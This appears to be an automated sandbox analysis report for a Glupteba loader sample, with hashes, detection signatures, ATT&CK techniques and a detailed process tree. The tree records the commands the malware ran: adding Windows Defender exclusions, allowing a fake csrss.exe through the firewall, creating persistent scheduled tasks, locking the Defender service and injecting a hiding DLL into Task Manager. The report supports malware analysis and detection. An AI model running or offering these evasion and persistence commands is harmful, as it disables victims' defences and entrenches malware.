glupteba | ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1

Resubmissions

04-02-2024 20:50

240204-zmv5ysadh5 10

17-12-2023 22:34

231217-2hhp6sgbaq 10

Analysis

max time kernel
0s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2024 20:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
Size

735KB
MD5

9f5cb3a9a4053a53063a9da9afbf6273
SHA1

b1ad9fe9cd4e8ddf11909751a2e0334c86ff206e
SHA256

ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1
SHA512

aaa720bb50f26f0508f1a3403da7189e7915c5663f08b35dd35299bfb6815c3f20bfb143d35cb57a0a95f623505809434ec28ecb7b90374e674a40381c079b26
SSDEEP

12288:xYRY4kQvFK/hSB8W5yWz2izHvqIknzbUtaD0Drt+/wQVbAV:/48SB8W5lzfqIknzCaoDWwWA

Score

10^/10

glupteba dropper evasion loader trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 8 IoCs

resource	yara_rule
behavioral3/memory/5032-87-0x0000000002E60000-0x000000000374B000-memory.dmp	family_glupteba
behavioral3/memory/5032-88-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral3/memory/4704-104-0x0000000002E80000-0x000000000376B000-memory.dmp	family_glupteba
behavioral3/memory/4704-105-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral3/memory/5032-149-0x0000000002E60000-0x000000000374B000-memory.dmp	family_glupteba
behavioral3/memory/5032-214-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral3/memory/5032-464-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral3/memory/1936-740-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 2 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths	WerFault.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe = "0"	WerFault.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 2 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
736	netsh.exe
4988	netsh.exe

UPX packed file 20 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral3/files/0x0006000000023243-117.dat	upx
behavioral3/memory/4372-124-0x0000000000310000-0x00000000007F8000-memory.dmp	upx
behavioral3/memory/1636-136-0x00000000000A0000-0x0000000000588000-memory.dmp	upx
behavioral3/memory/1636-140-0x00000000000A0000-0x0000000000588000-memory.dmp	upx
behavioral3/files/0x0006000000023243-142.dat	upx
behavioral3/memory/1560-145-0x0000000000310000-0x00000000007F8000-memory.dmp	upx
behavioral3/files/0x0006000000023243-148.dat	upx
behavioral3/memory/1364-153-0x0000000000310000-0x00000000007F8000-memory.dmp	upx
behavioral3/files/0x0006000000023251-134.dat	upx
behavioral3/files/0x0006000000023243-131.dat	upx
behavioral3/memory/4588-128-0x0000000000310000-0x00000000007F8000-memory.dmp	upx
behavioral3/files/0x0006000000023243-123.dat	upx
behavioral3/files/0x0006000000023243-111.dat	upx
behavioral3/memory/1560-232-0x0000000000310000-0x00000000007F8000-memory.dmp	upx
behavioral3/files/0x00090000000232b5-710.dat	upx
behavioral3/memory/3040-714-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral3/files/0x00090000000232b5-712.dat	upx
behavioral3/files/0x00090000000232b5-709.dat	upx
behavioral3/memory/3428-727-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral3/memory/3428-761-0x0000000000400000-0x00000000008DF000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
6	pastebin.com
10	pastebin.com

Launches sc.exe 1 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
3608	sc.exe

Program crash 64 IoCs

pid	pid_target	Process	procid_target
4128	5032	WerFault.exe	91
2332	5032	WerFault.exe	91
2520	5032	WerFault.exe	91
5012	5032	WerFault.exe	91
4212	5032	WerFault.exe	91
2492	4704	WerFault.exe	103
4932	4704	WerFault.exe	103
3760	4704	WerFault.exe	103
1168	4704	WerFault.exe	103
4592	4704	WerFault.exe	103
2316	5032	WerFault.exe	91
4172	4704	WerFault.exe	103
4464	4704	WerFault.exe	103
2140	4704	WerFault.exe	103
60	5032	WerFault.exe	91
2736	5032	WerFault.exe	91
3036	4704	WerFault.exe	103
2248	5032	WerFault.exe	91
2976	5032	WerFault.exe	91
4316	4704	WerFault.exe	103
2572	4704	WerFault.exe	103
1520	4704	WerFault.exe	103
432	4704	WerFault.exe	103
4944	4704	WerFault.exe	103
4360	5032	WerFault.exe	91
1252	4704	WerFault.exe	103
4448	5032	WerFault.exe	91
4452	4704	WerFault.exe	103
2644	5032	WerFault.exe	91
4196	4704	WerFault.exe	103
2432	5032	WerFault.exe	91
3020	4704	WerFault.exe	103
2144	5032	WerFault.exe	91
3380	5032	WerFault.exe	91
4724	4704	WerFault.exe	103
2564	5032	WerFault.exe	91
3892	4964	WerFault.exe	183
380	4256	WerFault.exe	184
4600	4964	WerFault.exe	183
2876	4964	WerFault.exe	183
1924	4964	WerFault.exe	183
1956	4964	WerFault.exe	183
3032	4256	WerFault.exe	184
364	4256	WerFault.exe	184
1408	4964	WerFault.exe	183
3028	4964	WerFault.exe	183
2332	4256	WerFault.exe	184
4236	4964	WerFault.exe	183
4692	4256	WerFault.exe	184
3488	4964	WerFault.exe	183
1096	4256	WerFault.exe	184
1568	4256	WerFault.exe	184
984	4256	WerFault.exe	184
752	4256	WerFault.exe	184
4140	4964	WerFault.exe	183
5036	1936	WerFault.exe	260
4612	4964	WerFault.exe	183
3632	1936	WerFault.exe	260
3432	1936	WerFault.exe	260
1800	1936	WerFault.exe	260
4764	1936	WerFault.exe	260
3996	1936	WerFault.exe	260
728	1936	WerFault.exe	260
448	4964	WerFault.exe	183

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4304	schtasks.exe
4052	schtasks.exe
3760	schtasks.exe
4584	schtasks.exe
1100	schtasks.exe
776	schtasks.exe
1636	schtasks.exe
3516	schtasks.exe
4060	schtasks.exe
380	schtasks.exe
2496	schtasks.exe
960	schtasks.exe
3584	schtasks.exe

C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe
"C:\Users\Admin\AppData\Local\Temp\ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe"
1⤵
PID:1096
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
  2⤵
  PID:4520
- - C:\Users\Admin\Pictures\WE9A0wJC6o9czh1qeoXd2bNE.exe
    "C:\Users\Admin\Pictures\WE9A0wJC6o9czh1qeoXd2bNE.exe"
    3⤵
    PID:5032
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 372
      4⤵
      Program crash
      PID:4128
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 388
      4⤵
      Program crash
      PID:2332
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 392
      4⤵
      Program crash
      PID:2520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 680
      4⤵
      Program crash
      PID:5012
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 692
      4⤵
      Program crash
      PID:4212
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 784
      4⤵
      Program crash
      PID:2316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 784
      4⤵
      Program crash
      PID:60
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 876
      4⤵
      Program crash
      PID:2736
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 800
      4⤵
      Program crash
      PID:2248
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 884
      4⤵
      Program crash
      PID:2976
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 820
      4⤵
      Program crash
      PID:4360
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 768
      4⤵
      Program crash
      PID:4448
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 748
      4⤵
      Program crash
      PID:2644
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 732
      4⤵
      Program crash
      PID:2432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 828
      4⤵
      Program crash
      PID:2144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 908
      4⤵
      Program crash
      PID:3380
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:5016
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 916
      4⤵
      Program crash
      PID:2564
  - - C:\Users\Admin\Pictures\WE9A0wJC6o9czh1qeoXd2bNE.exe
      "C:\Users\Admin\Pictures\WE9A0wJC6o9czh1qeoXd2bNE.exe"
      4⤵
      PID:4256
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 340
        5⤵
        Program crash
        
        PID:380
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 696
        5⤵
        Program crash
        
        PID:3032
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 696
        5⤵
        Program crash
        
        PID:364
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 724
        5⤵
        Program crash
        
        PID:2332
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 744
        5⤵
        Program crash
        
        PID:4692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:1624
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 696
        5⤵
        Windows security bypass
        Program crash
        
        PID:1096
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 640
        5⤵
        Program crash
        
        PID:1568
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 376
        5⤵
        Program crash
        
        PID:984
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4256 -s 356
        5⤵
        Program crash
        
        PID:752
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:2852
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4528
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4860
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:1936
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 372
        6⤵
        Program crash
        
        PID:5036
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 724
        6⤵
        Program crash
        
        PID:3632
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 756
        6⤵
        Program crash
        
        PID:3432
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 792
        6⤵
        Program crash
        
        PID:1800
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1888
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 724
        6⤵
        Program crash
        
        PID:4764
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 724
        6⤵
        Program crash
        
        PID:3996
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 672
        6⤵
        Program crash
        
        PID:728
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 392
        6⤵
        
        PID:3608
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 388
        6⤵
        
        PID:2576
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 732
        6⤵
        
        PID:2852
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 880
        6⤵
        
        PID:3600
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4508
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:1756
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:3760
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3776
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        Launches sc.exe
        
        PID:3608
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 952
        6⤵
        
        PID:720
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 968
        6⤵
        
        PID:4764
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:4840
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 940
        6⤵
        
        PID:2956
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 768
        6⤵
        
        PID:1928
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:4584
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:3040
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 1104
        6⤵
        
        PID:3776
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 1044
        6⤵
        
        PID:4540
- - C:\Users\Admin\Pictures\koDZh5iUjKesRinWjOgVUqDn.exe
    "C:\Users\Admin\Pictures\koDZh5iUjKesRinWjOgVUqDn.exe"
    3⤵
    PID:4704
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 388
      4⤵
      Program crash
      PID:2492
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 680
      4⤵
      Program crash
      PID:4932
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 692
      4⤵
      Program crash
      PID:3760
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 692
      4⤵
      Program crash
      PID:1168
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 748
      4⤵
      Program crash
      PID:4592
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 692
      4⤵
      Program crash
      PID:4172
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 692
      4⤵
      Program crash
      PID:4464
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 692
      4⤵
      Program crash
      PID:2140
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 632
      4⤵
      Program crash
      PID:3036
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 692
      4⤵
      Program crash
      PID:4316
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 796
      4⤵
      Program crash
      PID:2572
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 836
      4⤵
      Program crash
      PID:1520
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 816
      4⤵
      Program crash
      PID:432
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 792
      4⤵
      Program crash
      PID:4944
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 900
      4⤵
      Program crash
      PID:1252
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 392
      4⤵
      Program crash
      PID:4452
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 816
      4⤵
      Program crash
      PID:4196
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 372
      4⤵
      Program crash
      PID:3020
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 764
      4⤵
      Program crash
      PID:4724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      PID:4988
  - - C:\Users\Admin\Pictures\koDZh5iUjKesRinWjOgVUqDn.exe
      "C:\Users\Admin\Pictures\koDZh5iUjKesRinWjOgVUqDn.exe"
      4⤵
      PID:4964
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 340
        5⤵
        Program crash
        
        PID:3892
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 360
        5⤵
        Program crash
        
        PID:4600
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 372
        5⤵
        Program crash
        
        PID:2876
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 656
        5⤵
        Program crash
        
        PID:1924
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 668
        5⤵
        Program crash
        
        PID:1956
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 720
        5⤵
        Program crash
        
        PID:1408
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 728
        5⤵
        Program crash
        
        PID:3028
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 728
        5⤵
        Program crash
        
        PID:4236
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4388
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 668
        5⤵
        Program crash
        
        PID:3488
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4756
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 668
        5⤵
        Program crash
        
        PID:4140
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4232
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:4208
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 888
        5⤵
        Program crash
        
        PID:4612
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 796
        5⤵
        Program crash
        
        PID:448
- - C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe
    "C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe" --silent --allusers=0
    3⤵
    PID:4372
  - - C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe
      C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=106.0.4998.70 --initial-client-data=0x2e0,0x2e4,0x2e8,0x2bc,0x2ec,0x6f4f9558,0x6f4f9564,0x6f4f9570
      4⤵
      PID:4588
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0k9x3hVgAIkYEYadyRTuzK6g.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\0k9x3hVgAIkYEYadyRTuzK6g.exe" --version
      4⤵
      PID:1636
  - - C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe
      "C:\Users\Admin\Pictures\0k9x3hVgAIkYEYadyRTuzK6g.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4372 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240204205053" --session-guid=48bd4546-62b5-414d-9f65-05546e81c94f --server-tracking-blob=MzVkMmNlN2ViZmY3ZjEyYTI1NmMyZDFiZmYxYmYyMDBmZTIzNDc4NzYxODJhMTYwNDBiMTg1OTY4MWUyMjc2ZDp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwNzA3OTg1MC4zOTA5IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI3ZGVhMGQ2Yi0yNmRmLTQxNjktODkwYy0wNDlmYmUzMDU2YWUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=5C05000000000000
      4⤵
      PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\Assistant_106.0.4998.16_Setup.exe_sfx.exe"
      4⤵
      PID:4360
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\assistant_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202402042050531\assistant\assistant_installer.exe" --version
      4⤵
      PID:384
- - C:\Users\Admin\Pictures\RQqE6ESFHofxITB1DnsmdgY4.exe
    "C:\Users\Admin\Pictures\RQqE6ESFHofxITB1DnsmdgY4.exe" /VERYSILENT
    3⤵
    PID:3648
  - - C:\Users\Admin\AppData\Local\Temp\is-5A01J.tmp\RQqE6ESFHofxITB1DnsmdgY4.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-5A01J.tmp\RQqE6ESFHofxITB1DnsmdgY4.tmp" /SL5="$40230,831488,831488,C:\Users\Admin\Pictures\RQqE6ESFHofxITB1DnsmdgY4.exe" /VERYSILENT
      4⤵
      PID:1632
- - C:\Users\Admin\Pictures\3Ib2LXOcAv5vjsQhzDQ9Lzo6.exe
    "C:\Users\Admin\Pictures\3Ib2LXOcAv5vjsQhzDQ9Lzo6.exe"
    3⤵
    PID:4524
- - C:\Users\Admin\Pictures\ewcS5eoIevKxmbm9geux5foE.exe
    "C:\Users\Admin\Pictures\ewcS5eoIevKxmbm9geux5foE.exe"
    3⤵
    PID:4280
  - - C:\Users\Admin\AppData\Local\Temp\7zSAE80.tmp\Install.exe
      .\Install.exe
      4⤵
      PID:2788
    - - C:\Users\Admin\AppData\Local\Temp\7zSB064.tmp\Install.exe
        
        .\Install.exe /JPdidKxawB "385118" /S
        5⤵
        
        PID:4232
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:1756
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
